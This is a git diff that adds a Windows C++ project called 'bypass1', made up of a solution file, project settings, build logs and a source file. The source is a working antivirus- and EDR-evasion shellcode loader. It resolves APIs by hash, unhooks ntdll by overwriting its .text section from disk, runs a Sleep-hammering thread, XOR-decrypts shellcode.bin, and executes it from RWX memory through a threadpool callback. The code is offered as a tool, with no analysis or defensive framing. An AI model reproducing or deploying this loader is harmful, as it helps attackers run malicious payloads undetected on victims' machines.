diff --git a/bypass1/bypass1.cpp b/bypass1/bypass1.cpp
new file mode 100644
index 0000000..1feaeca
--- /dev/null
+++ b/bypass1/bypass1.cpp
@@ -0,0 +1,226 @@
+#include <windows.h>
+#include <tlhelp32.h>
+#include <vector>
+#include <fstream>
+#include <iterator>
+#include <winternl.h>
+#include <threadpoolapiset.h>
+#include <unordered_map>
+#include <thread>
+
+#pragma comment(lib, "ntdll.lib")
+
+std::unordered_map<DWORD, FARPROC> apiHashTable;
+
+DWORD HashString(const char* str) {
+    DWORD hash = 0;
+    while (*str) {
+        hash = ((hash << 5) + hash) + *str++;
+    }
+    return hash;
+}
+
+FARPROC ResolveAPI(DWORD hash) {
+    if (apiHashTable.find(hash) != apiHashTable.end()) {
+        return apiHashTable[hash];
+    }
+
+    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
+    if (!hNtdll) return nullptr;
+
+    auto pExportDir = reinterpret_cast<PIMAGE_EXPORT_DIRECTORY>(
+        reinterpret_cast<BYTE*>(hNtdll) +
+        reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(hNtdll) +
+            reinterpret_cast<PIMAGE_DOS_HEADER>(hNtdll)->e_lfanew)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+
+    auto pNames = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNames);
+    auto pFunctions = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfFunctions);
+    auto pOrdinals = reinterpret_cast<WORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNameOrdinals);
+
+    for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {
+        const char* apiName = reinterpret_cast<const char*>(reinterpret_cast<BYTE*>(hNtdll) + pNames[i]);
+        DWORD apiHash = HashString(apiName);
+
+        if (apiHash == hash) {
+            auto proc = reinterpret_cast<FARPROC>(reinterpret_cast<BYTE*>(hNtdll) + pFunctions[pOrdinals[i]]);
+            apiHashTable[hash] = proc;
+            return proc;
+        }
+    }
+    return nullptr;
+}
+
+typedef BOOL(WINAPI* LPDSENUMATTRIBUTES)(void* lpShellcode);
+
+void DecryptShellcode(std::vector<unsigned char>& shellcode, unsigned char key) {
+    for (size_t i = 0; i < shellcode.size(); ++i) {
+        shellcode[i] ^= key;
+    }
+}
+
+void UnhookNtdll() {
+    DWORD hashVirtualProtect = HashString("VirtualProtect");
+    FARPROC pVirtualProtect = ResolveAPI(hashVirtualProtect);
+
+    HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
+    if (!hNtdll) return;
+
+    wchar_t systemDir[MAX_PATH] = { 0 };
+    GetSystemDirectory(systemDir, MAX_PATH);
+
+    wchar_t ntdllPath[MAX_PATH] = { 0 };
+    wcscat_s(ntdllPath, systemDir);
+    wcscat_s(ntdllPath, L"\ntdll.dll");
+
+    HANDLE hFile = CreateFile(ntdllPath, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
+    if (hFile == INVALID_HANDLE_VALUE) return;
+
+    DWORD fileSize = GetFileSize(hFile, nullptr);
+    if (fileSize == INVALID_FILE_SIZE) {
+        CloseHandle(hFile);
+        return;
+    }
+
+    HANDLE hMapping = CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, fileSize, nullptr);
+    if (!hMapping) {
+        CloseHandle(hFile);
+        return;
+    }
+
+    void* pFileData = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);
+    if (!pFileData) {
+        CloseHandle(hMapping);
+        CloseHandle(hFile);
+        return;
+    }
+
+    auto pLoadedNtdll = reinterpret_cast<BYTE*>(hNtdll);
+    auto pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(pFileData);
+    auto pNtHeaders = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(pFileData) + pDosHeader->e_lfanew);
+
+    auto pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders);
+    for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++) {
+        if (!strcmp(reinterpret_cast<char*>(pSectionHeader->Name), ".text")) {
+            DWORD oldProtect;
+            reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
+                pLoadedNtdll + pSectionHeader->VirtualAddress,
+                pSectionHeader->Misc.VirtualSize,
+                PAGE_EXECUTE_READWRITE,
+                &oldProtect
+                );
+
+            memcpy(
+                pLoadedNtdll + pSectionHeader->VirtualAddress,
+                reinterpret_cast<BYTE*>(pFileData) + pSectionHeader->PointerToRawData,
+                pSectionHeader->SizeOfRawData
+            );
+
+            reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
+                pLoadedNtdll + pSectionHeader->VirtualAddress,
+                pSectionHeader->Misc.VirtualSize,
+                oldProtect,
+                &oldProtect
+                );
+            break;
+        }
+    }
+
+    UnmapViewOfFile(pFileData);
+    CloseHandle(hMapping);
+    CloseHandle(hFile);
+}
+
+void APIHammering() {
+    DWORD hashSleep = HashString("Sleep");
+    FARPROC pSleep = ResolveAPI(hashSleep);
+
+    std::thread hammeringThread([pSleep]() {
+        while (true) {
+            reinterpret_cast<void(WINAPI*)(DWORD)>(pSleep)(10);
+        }
+        });
+
+    hammeringThread.detach();
+}
+
+void ExecuteShellcodeWithThreadpool(const std::vector<unsigned char>& shellcode) {
+    void* execMemory = VirtualAlloc(
+        nullptr,
+        shellcode.size(),
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_EXECUTE_READWRITE
+    );
+
+    if (!execMemory) {
+        return;
+    }
+
+    memcpy(execMemory, shellcode.data(), shellcode.size());
+
+    PTP_WORK work = CreateThreadpoolWork(
+        [](PTP_CALLBACK_INSTANCE, void* context, PTP_WORK) {
+            auto shellcodePtr = reinterpret_cast<void(*)()>(context);
+            shellcodePtr();
+        },
+        execMemory,
+        nullptr
+    );
+
+    if (work) {
+        SubmitThreadpoolWork(work);
+        WaitForThreadpoolWorkCallbacks(work, FALSE);
+        CloseThreadpoolWork(work);
+    }
+
+    VirtualFree(execMemory, 0, MEM_RELEASE);
+}
+
+DWORD FindProcessId(const wchar_t* processName) {
+    PROCESSENTRY32 pe32;
+    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+    if (hSnapshot == INVALID_HANDLE_VALUE) {
+        return 0;
+    }
+
+    pe32.dwSize = sizeof(PROCESSENTRY32);
+    if (Process32First(hSnapshot, &pe32)) {
+        do {
+            if (!_wcsicmp(pe32.szExeFile, processName)) {
+                CloseHandle(hSnapshot);
+                return pe32.th32ProcessID;
+            }
+        } while (Process32Next(hSnapshot, &pe32));
+    }
+
+    CloseHandle(hSnapshot);
+    return 0;
+}
+
+int main() {
+    const char* filename = "shellcode.bin";
+    const unsigned char key = 0x5A;
+
+    UnhookNtdll();
+    APIHammering();
+
+    std::ifstream file(filename, std::ios::binary);
+    if (!file.is_open()) {
+        return -1;
+    }
+
+    std::vector<unsigned char> encryptedShellcode(
+        (std::istreambuf_iterator<char>(file)),
+        std::istreambuf_iterator<char>()
+    );
+    file.close();
+
+    if (encryptedShellcode.empty()) {
+        return -1;
+    }
+
+    DecryptShellcode(encryptedShellcode, key);
+
+    ExecuteShellcodeWithThreadpool(encryptedShellcode);
+
+    return 0;
+}
diff --git a/bypass1/bypass1.sln b/bypass1/bypass1.sln
new file mode 100644
index 0000000..c15bc4d
--- /dev/null
+++ b/bypass1/bypass1.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.11.35303.130
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bypass1", "bypass1.vcxproj", "{39C1481D-CD42-4E6E-8435-35AE9744975E}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x64.ActiveCfg = Debug|x64
+		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x64.Build.0 = Debug|x64
+		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x86.ActiveCfg = Debug|Win32
+		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x86.Build.0 = Debug|Win32
+		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x64.ActiveCfg = Release|x64
+		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x64.Build.0 = Release|x64
+		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x86.ActiveCfg = Release|Win32
+		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {0853DA9C-5E02-47FB-B6E6-E306AD32A614}
+	EndGlobalSection
+EndGlobal
diff --git a/bypass1/bypass1.vcxproj b/bypass1/bypass1.vcxproj
new file mode 100644
index 0000000..a1e4e71
--- /dev/null
+++ b/bypass1/bypass1.vcxproj
@@ -0,0 +1,141 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>17.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{39c1481d-cd42-4e6e-8435-35ae9744975e}</ProjectGuid>
+    <RootNamespace>bypass1</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+    <ProjectName>tp</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>false</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <WholeProgramOptimization>false</WholeProgramOptimization>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
+      <DebugInformationFormat>None</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="bypass1.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/bypass1/bypass1.vcxproj.filters b/bypass1/bypass1.vcxproj.filters
new file mode 100644
index 0000000..1549c1a
--- /dev/null
+++ b/bypass1/bypass1.vcxproj.filters
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="源文件">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="头文件">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="资源文件">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="bypass1.cpp">
+      <Filter>源文件</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/bypass1/bypass1.vcxproj.user b/bypass1/bypass1.vcxproj.user
new file mode 100644
index 0000000..0f14913
--- /dev/null
+++ b/bypass1/bypass1.vcxproj.user
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup />
+</Project>
\ No newline at end of file
diff --git a/bypass1/bypass1/x64/Release/bypass1.Build.CppClean.log b/bypass1/bypass1/x64/Release/bypass1.Build.CppClean.log
new file mode 100644
index 0000000..c44cd0f
--- /dev/null
+++ b/bypass1/bypass1/x64/Release/bypass1.Build.CppClean.log
@@ -0,0 +1,14 @@
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\vc143.pdb
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.obj
+c:\users\jason\source\repos\bypass1\x64\release\bypass1.exe
+c:\users\jason\source\repos\bypass1\x64\release\bypass1.pdb
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.ipdb
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.iobj
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.command.1.tlog
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.items.tlog
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.read.1.tlog
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.write.1.tlog
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.command.1.tlog
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.read.1.tlog
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.secondary.1.tlog
+c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.write.1.tlog
diff --git a/bypass1/bypass1/x64/Release/bypass1.exe.recipe b/bypass1/bypass1/x64/Release/bypass1.exe.recipe
new file mode 100644
index 0000000..f53c1ae
--- /dev/null
+++ b/bypass1/bypass1/x64/Release/bypass1.exe.recipe
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project>
+  <ProjectOutputs>
+    <ProjectOutput>
+      <FullPath>C:\Users\Jason\source\repos\bypass1\x64\Release\bypass1.exe</FullPath>
+    </ProjectOutput>
+  </ProjectOutputs>
+  <ContentFiles />
+  <SatelliteDlls />
+  <NonRecipeFileRefs />
+</Project>
\ No newline at end of file
diff --git a/bypass1/bypass1/x64/Release/bypass1.iobj b/bypass1/bypass1/x64/Release/bypass1.iobj
new file mode 100644
index 0000000..ca1bf4a
Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.iobj differ
diff --git a/bypass1/bypass1/x64/Release/bypass1.ipdb b/bypass1/bypass1/x64/Release/bypass1.ipdb
new file mode 100644
index 0000000..276dc5d
Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.ipdb differ
diff --git a/bypass1/bypass1/x64/Release/bypass1.log b/bypass1/bypass1/x64/Release/bypass1.log
new file mode 100644
index 0000000..0b63a42
--- /dev/null
+++ b/bypass1/bypass1/x64/Release/bypass1.log
@@ -0,0 +1,6 @@
+  tp.cpp
+  正在生成代码
+  Previous IPDB not found, fall back to full compilation.
+  All 378 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+  已完成代码的生成
+  bypass1.vcxproj -> C:\Users\Jason\source\repos\bypass1\x64\Release\bypass1.exe
diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/CL.command.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..0bfdd03
Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.command.1.tlog differ
diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/CL.read.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..cb09dbe
Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.read.1.tlog differ
diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/CL.write.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..0e90cc9
Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.write.1.tlog differ
diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/Cl.items.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/Cl.items.tlog
new file mode 100644
index 0000000..05ac254
--- /dev/null
+++ b/bypass1/bypass1/x64/Release/bypass1.tlog/Cl.items.tlog
@@ -0,0 +1 @@
+C:\Users\Jason\source\repos\bypass1\tp.cpp;C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\tp.obj
diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/bypass1.lastbuildstate b/bypass1/bypass1/x64/Release/bypass1.tlog/bypass1.lastbuildstate
new file mode 100644
index 0000000..1fb5cc0
--- /dev/null
+++ b/bypass1/bypass1/x64/Release/bypass1.tlog/bypass1.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0:
+Release|x64|C:\Users\Jason\source\repos\bypass1\|
diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/link.command.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/link.command.1.tlog
new file mode 100644
index 0000000..f78bf90
Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/link.command.1.tlog differ
diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/link.read.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/link.read.1.tlog
new file mode 100644
index 0000000..1fc2038
Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/link.read.1.tlog differ
diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/link.secondary.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/link.secondary.1.tlog
new file mode 100644
index 0000000..75c1dff
--- /dev/null
+++ b/bypass1/bypass1/x64/Release/bypass1.tlog/link.secondary.1.tlog
@@ -0,0 +1,3 @@
+^C:\USERS\JASON\SOURCE\REPOS\BYPASS1\BYPASS1\X64\RELEASE\TP.OBJ
+C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\bypass1.IPDB
+C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\bypass1.iobj
diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/link.write.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/link.write.1.tlog
new file mode 100644
index 0000000..a7b2e15
Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/link.write.1.tlog differ
diff --git a/bypass1/bypass1/x64/Release/bypass1.vcxproj.FileListAbsolute.txt b/bypass1/bypass1/x64/Release/bypass1.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..e69de29
diff --git a/bypass1/bypass1/x64/Release/tp.obj b/bypass1/bypass1/x64/Release/tp.obj
new file mode 100644
index 0000000..1530c10
Binary files /dev/null and b/bypass1/bypass1/x64/Release/tp.obj differ
diff --git a/bypass1/bypass1/x64/Release/vc143.pdb b/bypass1/bypass1/x64/Release/vc143.pdb
new file mode 100644
index 0000000..c91d7ae
Binary files /dev/null and b/bypass1/bypass1/x64/Release/vc143.pdb differ
diff --git a/bypass1/tp/x64/Release/bypass1.log b/bypass1/tp/x64/Release/bypass1.log
new file mode 100644
index 0000000..94599c4
--- /dev/null
+++ b/bypass1/tp/x64/Release/bypass1.log
@@ -0,0 +1,3 @@
+  bypass1.cpp
+  LINK : 已指定 /LTCG，但不需要生成代码；从链接命令行中移除 /LTCG 以提高链接器性能
+  bypass1.vcxproj -> C:\Users\Jason\source\repos\bypass1\x64\Release\tp.exe
diff --git a/bypass1/tp/x64/Release/bypass1.obj b/bypass1/tp/x64/Release/bypass1.obj
new file mode 100644
index 0000000..14dde69
Binary files /dev/null and b/bypass1/tp/x64/Release/bypass1.obj differ
diff --git a/bypass1/tp/x64/Release/bypass1.vcxproj.FileListAbsolute.txt b/bypass1/tp/x64/Release/bypass1.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..e69de29
diff --git a/bypass1/tp/x64/Release/tp.Build.CppClean.log b/bypass1/tp/x64/Release/tp.Build.CppClean.log
new file mode 100644
index 0000000..b6cb0b9
--- /dev/null
+++ b/bypass1/tp/x64/Release/tp.Build.CppClean.log
@@ -0,0 +1,10 @@
+c:\users\jason\source\repos\bypass1\tp\x64\release\bypass1.obj
+c:\users\jason\source\repos\bypass1\x64\release\tp.exe
+c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.command.1.tlog
+c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.items.tlog
+c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.read.1.tlog
+c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.write.1.tlog
+c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.command.1.tlog
+c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.read.1.tlog
+c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.secondary.1.tlog
+c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.write.1.tlog
diff --git a/bypass1/tp/x64/Release/tp.exe.recipe b/bypass1/tp/x64/Release/tp.exe.recipe
new file mode 100644
index 0000000..88f57c4
--- /dev/null
+++ b/bypass1/tp/x64/Release/tp.exe.recipe
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project>
+  <ProjectOutputs>
+    <ProjectOutput>
+      <FullPath>C:\Users\Jason\source\repos\bypass1\x64\Release\tp.exe</FullPath>
+    </ProjectOutput>
+  </ProjectOutputs>
+  <ContentFiles />
+  <SatelliteDlls />
+  <NonRecipeFileRefs />
+</Project>
\ No newline at end of file
diff --git a/bypass1/tp/x64/Release/tp.tlog/CL.command.1.tlog b/bypass1/tp/x64/Release/tp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..e8c08b4
Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/CL.command.1.tlog differ
diff --git a/bypass1/tp/x64/Release/tp.tlog/CL.read.1.tlog b/bypass1/tp/x64/Release/tp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..2b37fcc
Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/CL.read.1.tlog differ
diff --git a/bypass1/tp/x64/Release/tp.tlog/CL.write.1.tlog b/bypass1/tp/x64/Release/tp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..68176d8
Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/CL.write.1.tlog differ
diff --git a/bypass1/tp/x64/Release/tp.tlog/Cl.items.tlog b/bypass1/tp/x64/Release/tp.tlog/Cl.items.tlog
new file mode 100644
index 0000000..bb9a79d
--- /dev/null
+++ b/bypass1/tp/x64/Release/tp.tlog/Cl.items.tlog
@@ -0,0 +1 @@
+C:\Users\Jason\source\repos\bypass1\bypass1.cpp;C:\Users\Jason\source\repos\bypass1\tp\x64\Release\bypass1.obj
diff --git a/bypass1/tp/x64/Release/tp.tlog/link.command.1.tlog b/bypass1/tp/x64/Release/tp.tlog/link.command.1.tlog
new file mode 100644
